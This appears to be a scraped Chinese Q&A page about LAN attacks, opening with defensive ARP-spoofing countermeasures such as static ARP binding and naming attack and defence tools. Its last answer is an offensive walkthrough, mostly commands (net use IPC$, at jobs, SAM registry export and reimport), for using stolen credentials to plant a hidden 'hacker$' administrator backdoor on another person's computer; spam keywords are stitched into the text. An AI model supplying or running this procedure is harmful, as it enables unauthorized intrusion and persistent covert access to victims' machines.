文章导航:
- 1、局域网受到别人IP的限速软件攻击怎么办啊?
- 2、IP地址与网络上其他系统有冲突,局域网内有人进行ARP攻击,求教一个可以消除的防火墙软件
- 3、局域网ip冲突攻击器
- 4、谁知道怎样在局域网攻击别人电脑,或者有什么好的软件介绍个!
局域网受到别人IP的限速软件攻击怎么办啊?
这不是攻击问题了。
现在的互联网限制软件主要是通过ARP欺骗。
用记事本编写一个批处理文件rarp.bat内容如下:
@echo off
arp -d
arp -s 192.168.16.254 00-22-aa-00-22-aa
将文件中的网关IP地址和MAC地址更改为您自己的网关IP地址和MAC地址即可。
将这个批处理软件拖到“windows--开始--程序--启动”中。
在路由器上绑定用户主机的IP和MAC地址。
就可以了。
如果不知具体操作,就继续往下看。
1:在命令行状态,ping 网关地址(内网),例如你的网关(内网)是192.168.0.1,那么在命令行状态下你输入ping 192.168.0.1,回车。
2:在命令行状态下,输入arp -a,
C:\Documents and Settings\Administratorarp -a
Interface: 192.168.0.119 --- 0x10003
Internet Address Physical Address Type
192.168.0.1 00-e0-2a-b0-75-0c dynamic
192.168.1.1 00-e0-2a-75-75-75 static
这时候记下你的网关地址所对应的Physical Address ,也就是MAC地址。
3:下载解压程序(注意A.bat必须和FL.exe在同个目录下),编辑A.bat,并按照以下说明替换IP和MAc地址:
FL freeland=192.168.0.1 00-aa-bb-cc-dd-ee 1 freeland false
↓ ↓
替换为网关IP地址 替换为网关MAC值
例如你的网关是192.168.1.1 ,网关mac地址为00-e0-2a-75-75-75,那么你的A.bat内容应该是这样的
FL freeland=192.168.1.1 00-e0-2a-75-75-75 3 freeland false
4:如果以后更换网关网卡或者路由器,这时候网关的MAC地址就会改变,所以请重新检查mac地址并重新修改服务器共享盘内的A.bat的mac地址字符段(否则客户机会上不了网).
IP地址与网络上其他系统有冲突,局域网内有人进行ARP攻击,求教一个可以消除的防火墙软件
下载一个360安全卫士,打开里面ARP保护就行了~~!IP地址与网络上的其他系统有冲突,意思就是说IP重复了``重新修改一下你的IP地址就行了`
局域网ip冲突攻击器
防御的;360ARP防火墙,防P2P终结者,防聚生网管等。
攻击,P2P终结者,聚生网管等。
谁知道怎样在局域网攻击别人电脑,或者有什么好的软件介绍个!
我可以告诉你一个办法不过需要对象的用户名和口令局域网ip地址攻击软件下载,还要知道局域网ip地址攻击软件下载他的IP
地址,只要你知道拿到账号和密码半个小时就可以搞定,以后你就有一个自己的隐藏管理员账户,随便进入他的电脑。
在这里将用at的命令,因为用at产生的计划任务是以系统身份运行的,所以也用不到psu.exe程序。为了能够使用at命令,肉鸡必须开有schedule的服务,如果没有开启,可用流光里带的工具netsvc.exe或sc.exe来远程启动,当然其方法也可以,只要能启动schedule服务就行。
对于命令行方式,你可以采用各种连接方式,如用SQLexec连接MSSQL的1433端口,也可以用telnet服务,只要以你能得到一个cmdshell,并且有运行at命令的权限就可以。
1.这里先假设他的用户名为administrator,密码为12345678,现在我们开始在命令行下远程为它建立隐藏的超级用户。(假设主机是局域网内的一台主机,ip地址为13.50.97.238,。)
2.先与他建立连接:
net
use
\\13.50.97.238\ipc$
"12345678"
/user:"Administrator”
3.用at命令在他的电脑建立一个用户(如果at服务没有启动,可用netsvc.exe或sc.exe来远程启动):
at
\\13.50.97.238
12:51
c:\windows\system32\net.exe
user
hacker$
1234
/add
建立这个加有$符的用户名,是因为加有$符后,命令行下用net
user将不显示这个用户,但在帐户管理器却能看到这个用户。
4.同样用at命令导出HKEY_LOCAL_MACHINE\sam\sam\Domains\account\users下键值:
at
\\13.50.97.238
12:55
c:\windows\regedit.exe
/e
hacker.reg
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\account\users
/e
是regedit.exe的参数,在这里HKEY_LOCAL_MACHINE\SAM\SAM\Domains\account\users这个键的一定不要以“\“结尾。必要的情况下可以用引号将"c:\windows\regedit.exe
/e
hacker.reg
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\account\users"引起来。
5.将他的电脑上的hacker.reg下载到本机上用记事本打开进行编辑命令为:
Copy
\\13.50.97.238\admin$\system32\hacker.reg
c:\hacker.reg
6.再将编辑好的hacker.reg拷回他的电脑上
copy
c:\hacker.reg
\\13.50.97.238\admin$\system32\hacker1.reg
7.查看他的电脑时间:net
time
\\13.50.97.238然后用at命令将用户hacker$删除:
at
\\13.50.97.238
13:40
net
user
hacker$
/del
8.验证hacker$是否删除:net
use
\\13.50.97.238
/del
断开与他的电脑连接。
再用net
use
\\13.50.97.238\ipc$
"1234"
/user:"hacker$"
用帐户hacker$与他电脑连接,不能连接说明已删除。
9.再与他电脑建立连接:
net
use
\\13.50.97.238\ipc$
"12345678"
/user:"administrator"
再取得他的时间,用at命令将拷回他的hacker1.reg导入他的注册表:
at
\\13.50.97.238
13:41
c:\windows\regedit.exe
/s
hacker1.reg
regedit.exe的参数/s是指安静模式。
10.再验证hacker$是否已建立,方法同上面验证hacker$是否被删除一样。
11.再验证用户hacker$是否有读、写、删除的权限,如果不放心,你还可验证是否能建立其它帐户。
12.通过步骤11可以断定用户hacker$具有超级用户权限,因为最初我用at命令建立它的时候是一个普通用户,而现在却具有远程读、写、删除的权限。
OK
以后你可以随意拿你的账号进入他电脑里游荡了~~~~~~~~~~~~~~~
发布于 2022-12-09 22:28:41 回复
发布于 2022-12-09 12:31:17 回复
发布于 2022-12-09 14:13:36 回复
发布于 2022-12-09 21:16:34 回复